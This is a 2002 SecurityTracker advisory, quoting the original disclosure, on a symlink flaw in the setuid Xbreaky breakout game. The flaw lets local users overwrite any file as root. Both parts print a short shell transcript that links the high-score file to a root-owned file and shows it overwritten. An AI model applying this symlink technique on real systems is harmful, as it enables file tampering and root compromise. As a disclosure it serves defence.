SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   Xbreaky Vendors:   xbreaky.sourceforge.net
Xbreaky Game Temporary File Access Control Flaw Lets Local Users Overwrite Files With Root Permissions
SecurityTracker Alert ID:  1005225
SecurityTracker URL:  http://securitytracker.com/id/1005225
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 16 2002
Impact:   Modification of system information, Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): priro to 0.0.5
Description:   An access control vulnerability was reported in the Xbreaky game. A local user could overwrite files with root privileges and possibly gain root access on the system.

OBIT reported that a local user can create a symbolic link from the $HOME/.breakyhighscores file to any other file on the system. Then, because Xbreak is installed by default with set user id (setuid) permissions, Xbreaky will overwrite the linked file when executed.

A demonstration exploit transcript is provided:

root@animal:/home/marco# echo "bla" >rootfile
root@animal:/home/marco# chmod 600 rootfile
root@animal:/home/marco# exit
logout
marco@animal:~$ ln -s rootfile .breakyhighscores
marco@animal:~$ xbreaky

User plays game and sets highscore as user "lol" and then exists game.

marco@animal:~$ cat rootfile
cat: rootfile: Permission denied
marco@animal:~$ su -
Password:
root@animal:~# cat /home/marco/rootfile
lol <- voila, our highscore user

Impact:   A local user can overwrite arbitrary files with root level permissions. A local user may be able to exploit this to gain root access on the system.
Solution:   The vendor has released a fixed version (0.0.5), available at:

http://xbreaky.sourceforge.net/download.html

Vendor URL:  xbreaky.sourceforge.net/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  xbreaky symlink vulnerability


-----------------------------------------------------------------------
Title:             xbreaky symlink vulnerability
Author:            Marco van Berkum
Classification:    High risk
Date:              12/09/2002
Email:             m.v.berkum@obit.nl
Company:           OBIT
Company site:      http://www.obit.nl
Personal website:  http://ws.obit.nl
-----------------------------------------------------------------------

About xbreaky
-------------
xbreaky is a breakout game for X written by Dave Brul which can be downloaded
from http://xbreaky.sourceforge.net. xbreaky is added to the OpenBSD ports tree,
NetBSD tree and possibly others.

Problem
-------
By default xbreaky is installed as suid and can be abused to overwrite any file
on the filesystem, by any user.

Vulnerable versions
-------------------
All versions prior to 0.0.5

Exploit
-------
xbreaky uses $HOME/.breakyhighscores to write the highscores to, when
$HOME/.breakyhighscores is symlinked to another file (*any* file) it simply
overwrites it as root user.

Example
-------
root@animal:/home/marco# echo "bla" >rootfile
root@animal:/home/marco# chmod 600 rootfile
root@animal:/home/marco# exit
logout
marco@animal:~$ ln -s rootfile .breakyhighscores
marco@animal:~$ xbreaky

Now I play a game and set highscore as user "lol", then I exit the game.
Its a nice game btw :)

marco@animal:~$ cat rootfile
cat: rootfile: Permission denied
marco@animal:~$ su -
Password:
root@animal:~# cat /home/marco/rootfile
lol <- voila, our highscore user

Author's response and solution
------------------------------
The author corrected the problem and released xbreaky 0.0.5

Credits
-------
Thanks to Dennis Oelkers for testing.


--
find / -user your -name base -exec chown us:us {}\;
 ----------------------------------------
|    Marco van Berkum / MB17300-RIPE     |
| m.v.berkum@obit.nl / http://ws.obit.nl |
 ----------------------------------------



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC